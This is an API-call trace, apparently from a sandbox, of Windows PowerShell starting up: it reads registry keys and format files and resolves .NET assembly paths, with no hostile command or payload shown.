	[0652.105] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0652.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0652.105] CoTaskMemFree (pv=0x2edb20) 
	[0653.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d8e8 | out: phkResult=0x10d8e8*=0x31c) returned 0x0
	[0653.547] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x10d8fc, lpData=0x0, lpcbData=0x10d8f8*=0x0 | out: lpType=0x10d8fc*=0x1, lpData=0x0, lpcbData=0x10d8f8*=0x74) returned 0x0
	[0653.548] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x10d86c, lpData=0x0, lpcbData=0x10d868*=0x0 | out: lpType=0x10d86c*=0x1, lpData=0x0, lpcbData=0x10d868*=0x74) returned 0x0
	[0653.548] CoTaskMemAlloc (cb=0x78) returned 0x290a60
	[0653.548] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x10d83c, lpData=0x290a60, lpcbData=0x10d838*=0x74 | out: lpType=0x10d83c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d838*=0x74) returned 0x0
	[0653.548] CoTaskMemFree (pv=0x290a60) 
	[0653.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0653.548] SetErrorMode (uMode=0x1) returned 0x1
	[0653.548] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d7c0 | out: lpFileInformation=0x10d7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0653.548] SetErrorMode (uMode=0x1) returned 0x1
	[0657.611] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0657.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.612] CoTaskMemFree (pv=0x2edb20) 
	[0657.623] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0657.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.624] CoTaskMemFree (pv=0x2edb20) 
	[0657.625] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0657.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.625] CoTaskMemFree (pv=0x2edb20) 
	[0657.627] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0657.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.627] CoTaskMemFree (pv=0x2edb20) 
	[0657.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0657.628] SetErrorMode (uMode=0x1) returned 0x1
	[0657.628] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0657.628] GetFileType (hFile=0x2f4) returned 0x1
	[0657.629] SetErrorMode (uMode=0x1) returned 0x1
	[0657.629] GetFileType (hFile=0x2f4) returned 0x1
	[0657.629] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0657.631] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0657.631] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0657.631] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0657.632] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0657.632] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0657.632] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x9e2, lpOverlapped=0x0) returned 1
	[0657.633] ReadFile (in: hFile=0x2f4, lpBuffer=0x3163df2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x3163df2*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0657.633] ReadFile (in: hFile=0x2f4, lpBuffer=0x31648a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31648a8*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0657.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x2f4) returned 0x0
	[0657.633] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0657.633] CoTaskMemAlloc (cb=0x5a) returned 0x1b311890
	[0657.633] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b311890, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0657.634] CoTaskMemFree (pv=0x1b311890) 
	[0657.634] RegCloseKey (hKey=0x2f4) returned 0x0
	[0657.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0657.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0657.641] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x2eb88df, Data2=0xc4af, Data3=0x41d4, Data4=([0]=0x8c, [1]=0x30, [2]=0xcd, [3]=0xf, [4]=0x1c, [5]=0x7a, [6]=0xc4, [7]=0xa2))) returned 0x0
	[0657.647] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x3cc86d04, Data2=0xf8fd, Data3=0x4cac, Data4=([0]=0xaa, [1]=0x72, [2]=0x19, [3]=0xf8, [4]=0x3f, [5]=0x67, [6]=0x50, [7]=0x66))) returned 0x0
	[0657.648] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0657.648] GetFileType (hFile=0x2f4) returned 0x1
	[0657.648] SetErrorMode (uMode=0x1) returned 0x1
	[0657.648] GetFileType (hFile=0x2f4) returned 0x1
	[0657.649] ReadFile (in: hFile=0x2f4, lpBuffer=0x318f410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318f410*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.381] ReadFile (in: hFile=0x2f4, lpBuffer=0x318f410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318f410*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.382] ReadFile (in: hFile=0x2f4, lpBuffer=0x318f410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318f410*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.382] ReadFile (in: hFile=0x2f4, lpBuffer=0x318f410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318f410*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.383] ReadFile (in: hFile=0x2f4, lpBuffer=0x318f410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318f410*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.384] ReadFile (in: hFile=0x2f4, lpBuffer=0x318f410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318f410*, lpNumberOfBytesRead=0x10d458*=0xfb2, lpOverlapped=0x0) returned 1
	[0659.384] ReadFile (in: hFile=0x2f4, lpBuffer=0x318eb2a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318eb2a*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0659.384] ReadFile (in: hFile=0x2f4, lpBuffer=0x318f410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x318f410*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0659.385] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x2f4) returned 0x0
	[0659.385] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0659.385] CoTaskMemAlloc (cb=0x5a) returned 0x1b311c80
	[0659.385] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b311c80, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0659.385] CoTaskMemFree (pv=0x1b311c80) 
	[0659.385] RegCloseKey (hKey=0x2f4) returned 0x0
	[0659.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0659.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0659.388] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x5b8f0a3d, Data2=0x1540, Data3=0x4eb7, Data4=([0]=0xa1, [1]=0xb7, [2]=0xcd, [3]=0xb1, [4]=0x7f, [5]=0xc1, [6]=0x91, [7]=0xff))) returned 0x0
	[0659.389] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x1610bf9, Data2=0x7bf8, Data3=0x4be5, Data4=([0]=0xbf, [1]=0xd3, [2]=0x26, [3]=0x53, [4]=0x81, [5]=0x4c, [6]=0x59, [7]=0x33))) returned 0x0
	[0659.390] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xcbfec20d, Data2=0x8fbe, Data3=0x45a8, Data4=([0]=0xbb, [1]=0xd8, [2]=0xf5, [3]=0xc4, [4]=0xa7, [5]=0xa4, [6]=0x7b, [7]=0x14))) returned 0x0
	[0659.390] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x7a4a4a12, Data2=0xc12, Data3=0x4688, Data4=([0]=0xb0, [1]=0x6a, [2]=0x3, [3]=0x16, [4]=0xd2, [5]=0xaf, [6]=0xd1, [7]=0x1e))) returned 0x0
	[0659.390] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xca4c9ef8, Data2=0xa, Data3=0x430f, Data4=([0]=0x8b, [1]=0x56, [2]=0x73, [3]=0xf9, [4]=0xa4, [5]=0x1c, [6]=0x96, [7]=0x9f))) returned 0x0
	[0659.390] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0xd5dfa476, Data2=0xdc47, Data3=0x4d7c, Data4=([0]=0xa9, [1]=0xba, [2]=0xb8, [3]=0x98, [4]=0xe4, [5]=0x71, [6]=0xeb, [7]=0x18))) returned 0x0
	[0659.391] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0659.391] GetFileType (hFile=0x2f4) returned 0x1
	[0659.391] SetErrorMode (uMode=0x1) returned 0x1
	[0659.391] GetFileType (hFile=0x2f4) returned 0x1
	[0659.391] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.392] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.393] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.393] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.394] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.394] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0x1000, lpOverlapped=0x0) returned 1
	[0659.395] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0xaca, lpOverlapped=0x0) returned 1
	[0659.395] ReadFile (in: hFile=0x2f4, lpBuffer=0x31da7a2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31da7a2*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0659.395] ReadFile (in: hFile=0x2f4, lpBuffer=0x31db170, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d458, lpOverlapped=0x0 | out: lpBuffer=0x31db170*, lpNumberOfBytesRead=0x10d458*=0x0, lpOverlapped=0x0) returned 1
	[0659.395] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d4e8 | out: phkResult=0x10d4e8*=0x2f4) returned 0x0
	[0659.396] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d46c, lpData=0x0, lpcbData=0x10d468*=0x0 | out: lpType=0x10d46c*=0x1, lpData=0x0, lpcbData=0x10d468*=0x56) returned 0x0
	[0659.396] CoTaskMemAlloc (cb=0x5a) returned 0x1b311c80
	[0659.396] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d43c, lpData=0x1b311c80, lpcbData=0x10d438*=0x56 | out: lpType=0x10d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d438*=0x56) returned 0x0
	[0659.396] CoTaskMemFree (pv=0x1b311c80) 
	[0659.396] RegCloseKey (hKey=0x2f4) returned 0x0
	[0659.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0659.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0659.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0659.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0659.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0661.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0661.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0661.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0661.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0661.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0661.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0661.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0661.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0661.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0661.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0661.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0661.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0662.637] VirtualQuery (in: lpAddress=0x10bf80, lpBuffer=0x10ce40, dwLength=0x30 | out: lpBuffer=0x10ce40*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0662.638] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x19001091, Data2=0x494c, Data3=0x4ffe, Data4=([0]=0x85, [1]=0xd6, [2]=0xe7, [3]=0x11, [4]=0x15, [5]=0xdb, [6]=0x98, [7]=0x1d))) returned 0x0
	[0662.640] CoCreateGuid (in: pguid=0x10d710 | out: pguid=0x10d710*(Data1=0x7cdb1d1e, Data2=0x564a, Data3=0x4c24, Data4=([0]=0x88, [1]=0x99, [2]=0xc6, [3]=0x20, [4]=0x4f, [5]=0x84, [6]=0xc1, [7]=0x80))) returned 0x0
	[0662.640] VirtualQuery (in: lpAddress=0x10c130, lpBuffer=0x10cff0, dwLength=0x30 | out: lpBuffer=0x10cff0*(BaseAddress=0x10c000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
